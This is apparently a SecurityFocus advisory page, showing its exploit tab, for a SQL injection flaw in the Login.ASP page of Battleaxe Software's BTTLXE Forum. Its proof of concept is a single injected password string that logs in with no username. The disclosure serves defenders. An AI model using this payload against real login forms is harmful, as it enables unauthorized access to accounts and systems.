info
discussion
exploit
solution
references
Battleaxe Software BTTLXE Forum Login.ASP SQL Injection Vulnerability
The following proof of concept was supplied:
Log into a vulnerable forum using the following password:
'or''='
A username is not required.
Privacy Statement
Copyright 2010, SecurityFocus
